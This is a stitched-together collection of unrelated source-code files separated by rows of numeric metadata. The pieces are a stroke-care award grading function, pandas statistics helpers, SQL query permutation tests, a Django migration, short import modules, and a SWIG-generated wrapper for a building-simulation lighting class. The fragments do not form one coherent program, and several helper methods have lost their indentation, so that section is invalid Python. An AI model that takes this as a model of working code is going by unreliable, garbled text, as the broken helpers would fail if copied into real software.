            thrombectomy_pts = x['# patients eligible thrombectomy']
            # if thrombectomy_pts != 0:
            # Thrombectomy metrics are only graded when more than 3 patients were eligible.
            if thrombectomy_pts > 3:
                thrombectomy_therapy_lt_120min = x['% patients treated with door to thrombectomy < 120 minutes']
                if award != "STROKEREADY":
                    if (float(thrombectomy_therapy_lt_120min) >= 50 and float(thrombectomy_therapy_lt_120min) <= 74.99):
                        if (award == "PLATINUM" or award == "DIAMOND"):
                            award = "GOLD"
                    elif (float(thrombectomy_therapy_lt_120min) >= 75):
                        # NOTE(review): self-assignment is a no-op; at >= 75% the
                        # award is deliberately left unchanged.
                        if (award == "DIAMOND"):
                            award = "DIAMOND"
                else:
                    award = "STROKEREADY"
                thrombectomy_therapy_lt_90min = x['% patients treated with door to thrombectomy < 90 minutes']
                if award != "STROKEREADY":
                    if (float(thrombectomy_therapy_lt_90min) <= 49.99):
                        # NOTE(review): redundant `or` term, reduces to `award != "GOLD"`.
                        if (award != "GOLD" or award == "DIAMOND"):
                            award = "PLATINUM"
                    elif (float(thrombectomy_therapy_lt_90min) >= 50):
                        # NOTE(review): no-op self-assignment, award left unchanged.
                        if (award == "DIAMOND"):
                            award = "DIAMOND"
                else:
                    award = "STROKEREADY"
        else:
            # Old calculation: grade combined door-to-recanalization therapy times.
            recan_therapy_lt_60min = x['% patients treated with door to recanalization therapy < 60 minutes']
            if (float(recan_therapy_lt_60min) >= 50 and float(recan_therapy_lt_60min) <= 74.99):
                award = "GOLD"
            elif (float(recan_therapy_lt_60min) >= 75):
                award = "DIAMOND"
            else:
                award = "STROKEREADY"
            recan_therapy_lt_45min = x['% patients treated with door to recanalization therapy < 45 minutes']
            if award != "STROKEREADY":
                if (float(recan_therapy_lt_45min) <= 49.99):
                    # NOTE(review): redundant `or` term, reduces to `award != "GOLD"`.
                    if (award != "GOLD" or award == "DIAMOND"):
                        award = "PLATINUM"
                elif (float(recan_therapy_lt_45min) >= 50):
                    if (award != "GOLD"):
                        award = "DIAMOND"
            else:
                award = "STROKEREADY"
        # The remaining metrics are graded the same way for both calculations.
        recan_rate = x['% recanalization rate out of total ischemic incidence']
        if award != "STROKEREADY":
            if (float(recan_rate) >= 5 and float(recan_rate) <= 14.99):
                if (award == "PLATINUM" or award == "DIAMOND"):
                    award = "GOLD"
            elif (float(recan_rate) >= 15 and float(recan_rate) <= 24.99):
                if (award == "DIAMOND"):
                    award = "PLATINUM"
            elif (float(recan_rate) >= 25):
                # NOTE(review): no-op self-assignment, award left unchanged.
                if (award == "DIAMOND"):
                    award = "DIAMOND"
        else:
            award = "STROKEREADY"
        # CT/MRI rate: thresholds 80 / 85 / 90 %.
        ct_mri = x['% suspected stroke patients undergoing CT/MRI']
        if award != "STROKEREADY":
            if (float(ct_mri) >= 80 and float(ct_mri) <= 84.99):
                if (award == "PLATINUM" or award == "DIAMOND"):
                    award = "GOLD"
            elif (float(ct_mri) >= 85 and float(ct_mri) <= 89.99):
                if (award == "DIAMOND"):
                    award = "PLATINUM"
            elif (float(ct_mri) >= 90):
                if (award == "DIAMOND"):
                    award = "DIAMOND"
        else:
            award = "STROKEREADY"
        # Dysphagia screening rate: thresholds 80 / 85 / 90 %.
        dysphagia_screening = x['% all stroke patients undergoing dysphagia screening']
        if award != "STROKEREADY":
            if (float(dysphagia_screening) >= 80 and float(dysphagia_screening) <= 84.99):
                if (award == "PLATINUM" or award == "DIAMOND"):
                    award = "GOLD"
            elif (float(dysphagia_screening) >= 85 and float(dysphagia_screening) <= 89.99):
                if (award == "DIAMOND"):
                    award = "PLATINUM"
            elif (float(dysphagia_screening) >= 90):
                if (award == "DIAMOND"):
                    award = "DIAMOND"
        else:
            award = "STROKEREADY"
        # Antiplatelets on discharge: thresholds 80 / 85 / 90 %.
        discharged_with_antiplatelets_final = x['% ischemic stroke patients discharged (home) with antiplatelets']
        if award != "STROKEREADY":
            if (float(discharged_with_antiplatelets_final) >= 80 and float(discharged_with_antiplatelets_final) <= 84.99):
                if (award == "PLATINUM" or award == "DIAMOND"):
                    award = "GOLD"
            elif (float(discharged_with_antiplatelets_final) >= 85 and float(discharged_with_antiplatelets_final) <= 89.99):
                if (award == "DIAMOND"):
                    award = "PLATINUM"
            elif (float(discharged_with_antiplatelets_final) >= 90):
                if (award == "DIAMOND"):
                    award = "DIAMOND"
        else:
            award = "STROKEREADY"
        # Anticoagulants for afib patients on discharge: thresholds 80 / 85 / 90 %.
        discharged_with_anticoagulants_final = x['% afib patients discharged (home) with anticoagulants']
        if award != "STROKEREADY":
            if (float(discharged_with_anticoagulants_final) >= 80 and float(discharged_with_anticoagulants_final) <= 84.99):
                if (award == "PLATINUM" or award == "DIAMOND"):
                    award = "GOLD"
            elif (float(discharged_with_anticoagulants_final) >= 85 and float(discharged_with_anticoagulants_final) <= 89.99):
                if (award == "DIAMOND"):
                    award = "PLATINUM"
            elif (float(discharged_with_anticoagulants_final) >= 90):
                if (award == "DIAMOND"):
                    award = "DIAMOND"
        else:
            award = "STROKEREADY"
        # Stroke unit / ICU treatment rate: any non-zero rate (>= 1%) keeps the award.
        stroke_unit = x['% stroke patients treated in a dedicated stroke unit / ICU']
        if award != "STROKEREADY":
            if (float(stroke_unit) <= 0.99):
                if (award == "DIAMOND"):
                    award = "PLATINUM"
            elif (float(stroke_unit) >= 1):
                if (award == "DIAMOND"):
                    award = "DIAMOND"
        else:
            award = "STROKEREADY"
    return award
def _count_patients(self, dataframe):
""" The function calculating the number of patients per site.
:param dataframe: the dataframe with the raw data
:type dataframe: dataframe
:returns: the column with number of patients
"""
tmpDf = dataframe.groupby(['Protocol ID']).size().reset_index(name='count_patients')
factorDf = self.statsDf.merge(tmpDf, how='outer')
factorDf.fillna(0, inplace=True)
return factorDf['count_patients']
def _get_values_only_columns(self, column_name, value, dataframe):
""" The function calculating the numbeer of patients per site for the given value from the temporary dataframe.
:param column_name: the name of column name the number of patients should be calculated
:type column_name: str
:param value: the value for which we would like to get number of patients from the specific column
:type value: int
:param dataframe: the dataframe with the raw data
:type dataframe: pandas dataframe
:returns: the column with the number of patients
"""
tmpDf = dataframe[dataframe[column_name] == value].reset_index()[['Protocol ID', 'count']]
factorDf = self.statsDf.merge(tmpDf, how='outer')
factorDf.fillna(0, inplace=True)
return factorDf['count']
def _get_values_for_factors(self, column_name, value, new_column_name, df=None):
""" The function calculating the numbeer of patients per site for the given value from the temporary dataframe.
:param column_name: the name of column name the number of patients should be calculated
:type column_name: str
:param value: the value for which we would like to get number of patients from the specific column
:type value: int
:param new_column_name: to this value will be renamed the created column containing the number of patients
:type new_column_name: str
:param df: the dataframe with the raw data
:type df: pandas dataframe
:returns: the dataframe with calculated statistics
"""
# Check if type of column name is type of number, if not convert value into string
if (self.tmp[column_name].dtype != np.number):
value = str(value)
else:
value = value
tmpDf = self.tmp[self.tmp[column_name] == value].reset_index()[['Protocol ID', 'count']]
factorDf = self.statsDf.merge(tmpDf, how='outer')
factorDf.rename(columns={'count': new_column_name}, inplace=True)
factorDf.fillna(0, inplace=True)
return factorDf
def _get_values_for_factors_more_values(self, column_name, value, new_column_name, df=None):
""" The function calculating the number of patients per site for the given value from the temporary dataframe.
:param column_name: the name of column name the number of patients should be calculated
:type column_name: str
:param value: the list of values for which we would like to get number of patients from the specific column
:type value: list
:param new_column_name: to this value will be renamed the created column containing the number of patients
:type new_column_name: str
:param df: the dataframe with the raw data
:type df: pandas dataframe
:returns: the dataframe with calculated statistics
"""
if df is None:
tmpDf = self.tmp[self.tmp[column_name].isin(value)].reset_index()[['Protocol ID', 'count']]
tmpDf = tmpDf.groupby('Protocol ID').sum().reset_index()
factorDf = self.statsDf.merge(tmpDf, how='outer')
factorDf.rename(columns={'count': new_column_name}, inplace=True)
factorDf.fillna(0, inplace=True)
else:
tmpDf = df[df[column_name].isin(value)].reset_index()[['Protocol ID', 'count']]
tmpDf = tmpDf.groupby('Protocol ID').sum().reset_index()
factorDf = self.statsDf.merge(tmpDf, how='outer')
factorDf.rename(columns={'count': new_column_name}, inplace=True)
factorDf.fillna(0, inplace=True)
return factorDf
def _get_values_for_factors_containing(self, column_name, value, new_column_name, df=None):
""" The function calculating the number of patients per site for the given value from the temporary dataframe.
:param column_name: the name of column name the number of patients should be calculated
:type column_name: str
:param value: the value of string type for which we would like to get number of patients from the specific column
:type value: str
:param new_column_name: to this value will be renamed the created column containing the number of patients
:type new_column_name: str
:param df: the dataframe with the raw data
:type df: pandas dataframe
:returns: the dataframe with calculated statistics
"""
if df is None:
tmpDf = self.tmp[self.tmp[column_name].str.contains(value)].reset_index()[['Protocol ID', 'count']]
tmpDf = tmpDf.groupby('Protocol ID').sum().reset_index()
factorDf = self.statsDf.merge(tmpDf, how='outer')
factorDf.rename(columns={'count': new_column_name}, inplace=True)
factorDf.fillna(0, inplace=True)
else:
tmpDf = df[df[column_name].str.contains(value)].reset_index()[['Protocol ID', 'count']]
tmpDf = tmpDf.groupby('Protocol ID').sum().reset_index()
factorDf = self.statsDf.merge(tmpDf, how='outer')
factorDf.rename(columns={'count': new_column_name}, inplace=True)
factorDf.fillna(0, inplace=True)
return factorDf
def _get_ctmri_delta(self, hosp_time, ct_time):
""" The function calculating the difference between two times in minutes.
:param hosp_time: the time of hospitalization
:type hosp_time: time
:param ct_time: the time when CT/MRI was performed
:type ct_time: time
:returns: tdelta between two times in minutes
"""
timeformat = '%H:%M:%S'
# Check if both time are not None if yes, return 0 else return tdelta
if hosp_time is None or ct_time is None or pd.isnull(hosp_time) or pd.isnull(ct_time):
tdeltaMin = 0
elif hosp_time == 0 or ct_time == 0:
tdeltaMin = 0
else:
if isinstance(ct_time, time) and isinstance(hosp_time, time):
tdelta = datetime.combine(date.today(), ct_time) - datetime.combine(date.today(), hosp_time)
elif isinstance(ct_time, time):
tdelta = datetime.combine(date.today(), ct_time) - datetime.strptime(hosp_time, timeformat)
elif isinstance(hosp_time, time):
tdelta = datetime.strptime(ct_time, timeformat) - datetime.strptime(hosp_time, timeformat)
else:
tdelta = datetime.strptime(ct_time, timeformat) - datetime.strptime(hosp_time, timeformat)
tdeltaMin = tdelta.total_seconds()/60.0
if tdeltaMin > 60:
res = 2
elif tdeltaMin <= 60 and tdeltaMin > 0:
res = 1
else:
res = -2
return res
def _return_dataset(self):
    """Return the raw dataframe stored on this object.

    :returns: ``self.df``, the dataframe this statistics object was built from
    """
    return self.df
def _return_stats(self):
    """Return the dataframe with the calculated statistics.

    :returns: ``self.statsDf``, the per-site statistics dataframe
    """
    return self.statsDf
def _get_sites(self, df):
""" The function returning the list of sites in the preprocessed data.
:returns: the list of sites
"""
site_ids = df['Site ID'].tolist()
site_list = list(set(site_ids))
return site_list
@property
def country_name(self):
    """Read-only accessor for the stored ``_country_name`` value."""
    return self._country_name
| 96.405449
| 1,175
| 0.683898
| 30,957
| 240,628
| 5.086087
| 0.022515
| 0.078037
| 0.023398
| 0.042337
| 0.908384
| 0.873776
| 0.840152
| 0.807774
| 0.775383
| 0.73208
| 0
| 0.017137
| 0.179115
| 240,628
| 2,495
| 1,176
| 96.444088
| 0.779965
| 0.107901
| 0
| 0.316839
| 0
| 0
| 0.386846
| 0.079148
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01551
| false
| 0
| 0.008124
| 0.000739
| 0.039143
| 0.000739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
61a276c4ae721f1e18e33a6cdf82a3165f5b364f
| 3,994
|
py
|
Python
|
dqo/relational/tests/test_augmentation.py
|
danield137/deep_query_optimzation
|
01a25c966338007f15d14dea1b37e388e47bcfe3
|
[
"MIT"
] | null | null | null |
dqo/relational/tests/test_augmentation.py
|
danield137/deep_query_optimzation
|
01a25c966338007f15d14dea1b37e388e47bcfe3
|
[
"MIT"
] | null | null | null |
dqo/relational/tests/test_augmentation.py
|
danield137/deep_query_optimzation
|
01a25c966338007f15d14dea1b37e388e47bcfe3
|
[
"MIT"
] | null | null | null |
from dqo.db.tests.datasets import employees_db_w_meta
from dqo.relational import SQLParser
from dqo.relational import parse_tree
# Module-level fixture: employees database with metadata.
# NOTE(review): test_db is not referenced by any test in this module --
# confirm whether it is needed (e.g. for an import-time side effect) or dead.
test_db = employees_db_w_meta()
def test_condition_permutation():
    """All permutations of a single-condition query render to distinct SQL
    while keeping the same selections, projections and relations."""
    sql = """
    SELECT MIN(employees.salary)
    FROM employees
    WHERE employees.id > 200
    """
    tree = SQLParser.to_relational_tree(sql)
    permutations = tree.permutations()
    assert len(permutations) == 2
    rendered = [
        parse_tree(perm, keep_order=True).to_sql(pretty=False, alias=False)
        for perm in permutations
    ]
    # Textually distinct: a set keeps only unique renderings.
    assert len(set(rendered)) == len(rendered)

    # Semantically identical: every permutation has the same shape counts
    # (selections, projections, relations) as the first one.
    def shape(t):
        return (
            len(list(t.get_selections())),
            len(list(t.get_projections())),
            len(list(t.relations.keys())),
        )

    reference = shape(permutations[0])
    for perm in permutations[1:]:
        assert shape(perm) == reference
def test_join_permutation():
    """All permutations of a two-join query render to distinct SQL while
    keeping the same selections, projections and relations."""
    sql = """
    SELECT MIN(employees.salary)
    FROM employees, departments, companies
    WHERE employees.id = departments.id AND companies.id = departments.id
    """
    tree = SQLParser.to_relational_tree(sql)
    permutations = tree.permutations()
    assert len(permutations) == 4
    rendered = [
        parse_tree(perm, keep_order=True).to_sql(pretty=False, alias=False)
        for perm in permutations
    ]
    # Textually distinct: a set keeps only unique renderings.
    assert len(set(rendered)) == len(rendered)

    # Semantically identical: every permutation has the same shape counts
    # (selections, projections, relations) as the first one.
    def shape(t):
        return (
            len(list(t.get_selections())),
            len(list(t.get_projections())),
            len(list(t.relations.keys())),
        )

    reference = shape(permutations[0])
    for perm in permutations[1:]:
        assert shape(perm) == reference
def test_conditions_permutation():
    """All permutations of a three-condition query render to distinct SQL
    while keeping the same selections, projections and relations."""
    sql = """
    SELECT MIN(employees.salary)
    FROM employees
    WHERE employees.id > 1 AND employees.salary > 100 AND employees.salary < 200
    """
    tree = SQLParser.to_relational_tree(sql)
    permutations = tree.permutations()
    # assert len(permutations) == 6
    rendered = [
        parse_tree(perm, keep_order=True).to_sql(pretty=False, alias=False)
        for perm in permutations
    ]
    # Textually distinct: a set keeps only unique renderings.
    assert len(set(rendered)) == len(rendered)

    # Semantically identical: every permutation has the same shape counts
    # (selections, projections, relations) as the first one.
    def shape(t):
        return (
            len(list(t.get_selections())),
            len(list(t.get_projections())),
            len(list(t.relations.keys())),
        )

    reference = shape(permutations[0])
    for perm in permutations[1:]:
        assert shape(perm) == reference
def test_join_and_selection_permutations():
    """All permutations of a mixed join-plus-selection query render to
    distinct SQL while keeping the same selections, projections and
    relations."""
    sql = """
    SELECT MIN(employees.salary)
    FROM employees, departments
    WHERE employees.id > 1 AND employees.dept_id = departments.id
    """
    tree = SQLParser.to_relational_tree(sql)
    permutations = tree.permutations()
    # assert len(permutations) == 8
    rendered = [
        parse_tree(perm, keep_order=True).to_sql(pretty=False, alias=False)
        for perm in permutations
    ]
    # Textually distinct: a set keeps only unique renderings.
    assert len(set(rendered)) == len(rendered)

    # Semantically identical: every permutation has the same shape counts
    # (selections, projections, relations) as the first one.
    def shape(t):
        return (
            len(list(t.get_selections())),
            len(list(t.get_projections())),
            len(list(t.relations.keys())),
        )

    reference = shape(permutations[0])
    for perm in permutations[1:]:
        assert shape(perm) == reference
| 34.431034
| 102
| 0.662494
| 528
| 3,994
| 4.892045
| 0.136364
| 0.065041
| 0.060395
| 0.088269
| 0.897406
| 0.897406
| 0.881146
| 0.881146
| 0.837398
| 0.837398
| 0
| 0.008604
| 0.214321
| 3,994
| 115
| 103
| 34.730435
| 0.814532
| 0.091888
| 0
| 0.783784
| 0
| 0
| 0.160398
| 0.02323
| 0
| 0
| 0
| 0
| 0.243243
| 1
| 0.054054
| false
| 0
| 0.040541
| 0
| 0.094595
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4ee532fd58e6d9d5f5133bca89673cde76f9ac90
| 1,580
|
py
|
Python
|
netbox/extras/migrations/0061_extras_change_logging.py
|
TheFlyingCorpse/netbox
|
a226f06b1beb575011d783b202d76cb74d3b1f79
|
[
"Apache-2.0"
] | 4,994
|
2019-07-01T13:15:44.000Z
|
2022-03-31T19:55:45.000Z
|
netbox/extras/migrations/0061_extras_change_logging.py
|
TheFlyingCorpse/netbox
|
a226f06b1beb575011d783b202d76cb74d3b1f79
|
[
"Apache-2.0"
] | 4,045
|
2019-07-01T14:24:09.000Z
|
2022-03-31T16:07:39.000Z
|
netbox/extras/migrations/0061_extras_change_logging.py
|
TheFlyingCorpse/netbox
|
a226f06b1beb575011d783b202d76cb74d3b1f79
|
[
"Apache-2.0"
] | 1,225
|
2019-07-01T15:34:03.000Z
|
2022-03-31T16:47:09.000Z
|
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add nullable ``created``/``last_updated`` audit columns to the
    customfield, customlink, exporttemplate and webhook models."""

    dependencies = [
        ('extras', '0060_customlink_button_class'),
    ]

    # One (created, last_updated) AddField pair per model, emitted in the
    # same order as the original hand-written list.
    operations = [
        operation
        for target in ('customfield', 'customlink', 'exporttemplate', 'webhook')
        for operation in (
            migrations.AddField(
                model_name=target,
                name='created',
                field=models.DateField(auto_now_add=True, null=True),
            ),
            migrations.AddField(
                model_name=target,
                name='last_updated',
                field=models.DateTimeField(auto_now=True, null=True),
            ),
        )
    ]
| 30.384615
| 65
| 0.563924
| 145
| 1,580
| 5.958621
| 0.213793
| 0.166667
| 0.212963
| 0.25
| 0.861111
| 0.861111
| 0.804398
| 0.804398
| 0.804398
| 0.732639
| 0
| 0.003735
| 0.322152
| 1,580
| 51
| 66
| 30.980392
| 0.802988
| 0
| 0
| 0.851064
| 0
| 0
| 0.122785
| 0.017722
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.021277
| 0
| 0.085106
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
f609ea1edf133c69b084cabfbd8b3cb1f4199f52
| 37
|
py
|
Python
|
heatmap/__init__.py
|
Bilal-Yousaf/heatmap
|
789907301f9663feca72fb84dffbe2de08869975
|
[
"MIT"
] | 5
|
2020-03-25T20:31:48.000Z
|
2021-04-23T09:53:50.000Z
|
heatmap/__init__.py
|
Bilal-Yousaf/HeatMap
|
789907301f9663feca72fb84dffbe2de08869975
|
[
"MIT"
] | null | null | null |
heatmap/__init__.py
|
Bilal-Yousaf/HeatMap
|
789907301f9663feca72fb84dffbe2de08869975
|
[
"MIT"
] | null | null | null |
from .heatmap import generate_heatmap
| 37
| 37
| 0.891892
| 5
| 37
| 6.4
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081081
| 37
| 1
| 37
| 37
| 0.941176
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f6228da345431023f7834e4201a3bb44d8f2ebe1
| 112
|
py
|
Python
|
backend/auth_app/serializers/__init__.py
|
nitinmehra/TodoApp
|
e1e8938330df6b59b8b064ac1a2dde61744d8392
|
[
"MIT"
] | null | null | null |
backend/auth_app/serializers/__init__.py
|
nitinmehra/TodoApp
|
e1e8938330df6b59b8b064ac1a2dde61744d8392
|
[
"MIT"
] | null | null | null |
backend/auth_app/serializers/__init__.py
|
nitinmehra/TodoApp
|
e1e8938330df6b59b8b064ac1a2dde61744d8392
|
[
"MIT"
] | null | null | null |
from .auth_serializer import MyTokenObtainPairSerializer
from .register_serializer import UserRegisterSerializer
| 56
| 56
| 0.919643
| 10
| 112
| 10.1
| 0.7
| 0.316832
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 112
| 2
| 57
| 56
| 0.961905
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9cb959cded414dc66d1ee592c294e6008ab6b58b
| 11,162
|
py
|
Python
|
SimModel_Python_API/simmodel_swig/Release/SimInternalLoad_Lights_Default.py
|
EnEff-BIM/EnEffBIM-Framework
|
6328d39b498dc4065a60b5cc9370b8c2a9a1cddf
|
[
"MIT"
] | 3
|
2016-05-30T15:12:16.000Z
|
2022-03-22T08:11:13.000Z
|
SimModel_Python_API/simmodel_swig/Release/SimInternalLoad_Lights_Default.py
|
EnEff-BIM/EnEffBIM-Framework
|
6328d39b498dc4065a60b5cc9370b8c2a9a1cddf
|
[
"MIT"
] | 21
|
2016-06-13T11:33:45.000Z
|
2017-05-23T09:46:52.000Z
|
SimModel_Python_API/simmodel_swig/Release/SimInternalLoad_Lights_Default.py
|
EnEff-BIM/EnEffBIM-Framework
|
6328d39b498dc4065a60b5cc9370b8c2a9a1cddf
|
[
"MIT"
] | null | null | null |
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.7
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
# SWIG bootstrap: locate and load the compiled extension module
# '_SimInternalLoad_Lights_Default' next to this file (Python >= 2.6),
# falling back to a plain import otherwise. Auto-generated -- do not edit.
from sys import version_info
if version_info >= (2, 6, 0):
    def swig_import_helper():
        """Load the SWIG C-extension module from this package's directory."""
        from os.path import dirname
        import imp
        fp = None
        try:
            fp, pathname, description = imp.find_module('_SimInternalLoad_Lights_Default', [dirname(__file__)])
        except ImportError:
            # Not found beside this file: fall back to normal sys.path lookup.
            import _SimInternalLoad_Lights_Default
            return _SimInternalLoad_Lights_Default
        if fp is not None:
            try:
                _mod = imp.load_module('_SimInternalLoad_Lights_Default', fp, pathname, description)
            finally:
                fp.close()
            return _mod
    _SimInternalLoad_Lights_Default = swig_import_helper()
    del swig_import_helper
else:
    import _SimInternalLoad_Lights_Default
del version_info
try:
    _swig_property = property
except NameError:
    pass  # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
    """SWIG attribute setter: route writes through the generated setter
    table; with static=1, reject attributes the C++ class does not declare."""
    if (name == "thisown"):
        return self.this.own(value)
    if (name == "this"):
        if type(value).__name__ == 'SwigPyObject':
            self.__dict__[name] = value
            return
    method = class_type.__swig_setmethods__.get(name, None)
    if method:
        return method(self, value)
    if (not static):
        if _newclass:
            object.__setattr__(self, name, value)
        else:
            self.__dict__[name] = value
    else:
        raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
    """Non-static variant of the SWIG setter (allows new Python attributes)."""
    return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr_nondynamic(self, class_type, name, static=1):
    """SWIG attribute getter: look *name* up in the generated getter table."""
    if (name == "thisown"):
        return self.this.own()
    method = class_type.__swig_getmethods__.get(name, None)
    if method:
        return method(self)
    if (not static):
        # NOTE(review): object has no __getattr__, so this line always raises
        # AttributeError -- apparently the intended fallback, but confirm.
        return object.__getattr__(self, name)
    else:
        raise AttributeError(name)
def _swig_getattr(self, class_type, name):
    """Non-static variant of the SWIG getter."""
    return _swig_getattr_nondynamic(self, class_type, name, 0)
def _swig_repr(self):
    """Repr for SWIG proxies; tolerates a missing underlying C++ object."""
    try:
        strthis = "proxy of " + self.this.__repr__()
    except:
        strthis = ""
    return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
# Compatibility shims for very old Pythons: detect new-style classes and
# fall back gracefully when 'object' or 'weakref' are unavailable.
try:
    _object = object
    _newclass = 1
except AttributeError:
    class _object:
        pass
    _newclass = 0
try:
    import weakref
    weakref_proxy = weakref.proxy
except:
    weakref_proxy = lambda x: x
import base
import SimInternalLoad_Equipment_Electric
class SimInternalLoad_Lights(SimInternalLoad_Equipment_Electric.SimInternalLoad):
    """SWIG proxy for the C++ SimInternalLoad_Lights class.

    Auto-generated by SWIG -- do not edit by hand; modify the SWIG
    interface file and regenerate instead. Each method forwards to the
    compiled extension module.
    """
    __swig_setmethods__ = {}
    for _s in [SimInternalLoad_Equipment_Electric.SimInternalLoad]:
        __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
    __setattr__ = lambda self, name, value: _swig_setattr(self, SimInternalLoad_Lights, name, value)
    __swig_getmethods__ = {}
    for _s in [SimInternalLoad_Equipment_Electric.SimInternalLoad]:
        __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
    __getattr__ = lambda self, name: _swig_getattr(self, SimInternalLoad_Lights, name)
    __repr__ = _swig_repr

    def SimInternalLoad_Name(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_Name(self, *args)

    def SimInternalLoad_ZoneOrZoneListName(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_ZoneOrZoneListName(self, *args)

    def SimInternalLoad_FracRadiant(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_FracRadiant(self, *args)

    def SimInternalLoad_SchedName(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_SchedName(self, *args)

    def SimInternalLoad_DesignLevelCalcMeth(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_DesignLevelCalcMeth(self, *args)

    def SimInternalLoad_LightLevel(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_LightLevel(self, *args)

    def SimInternalLoad_PowerPerZoneFloorArea(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_PowerPerZoneFloorArea(self, *args)

    def SimInternalLoad_PowerPerPerson(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_PowerPerPerson(self, *args)

    def SimInternalLoad_RtnAirFrac(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_RtnAirFrac(self, *args)

    def SimInternalLoad_FracVisible(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_FracVisible(self, *args)

    def SimInternalLoad_FracReplaceable(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_FracReplaceable(self, *args)

    def SimInternalLoad_EndUseSubCat(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_EndUseSubCat(self, *args)

    def SimInternalLoad_RtnAirFracCalcFromPlenTemp(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_RtnAirFracCalcFromPlenTemp(self, *args)

    def SimInternalLoad_RtnAirFracFuncofPlenumTempCoef1(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_RtnAirFracFuncofPlenumTempCoef1(self, *args)

    def SimInternalLoad_RtnAirFracFuncofPlenumTempCoef2(self, *args):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_RtnAirFracFuncofPlenumTempCoef2(self, *args)

    def __init__(self, *args):
        this = _SimInternalLoad_Lights_Default.new_SimInternalLoad_Lights(*args)
        try:
            self.this.append(this)
        except:
            self.this = this

    def _clone(self, f=0, c=None):
        return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights__clone(self, f, c)
    __swig_destroy__ = _SimInternalLoad_Lights_Default.delete_SimInternalLoad_Lights
    __del__ = lambda self: None
# Register the proxy class with the extension module.
SimInternalLoad_Lights_swigregister = _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_swigregister
SimInternalLoad_Lights_swigregister(SimInternalLoad_Lights)
class SimInternalLoad_Lights_Default(SimInternalLoad_Lights):
    """SWIG proxy for the C++ SimInternalLoad_Lights_Default class.

    Auto-generated by SWIG -- do not edit by hand; regenerate from the
    SWIG interface file instead.
    """
    __swig_setmethods__ = {}
    for _s in [SimInternalLoad_Lights]:
        __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
    __setattr__ = lambda self, name, value: _swig_setattr(self, SimInternalLoad_Lights_Default, name, value)
    __swig_getmethods__ = {}
    for _s in [SimInternalLoad_Lights]:
        __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
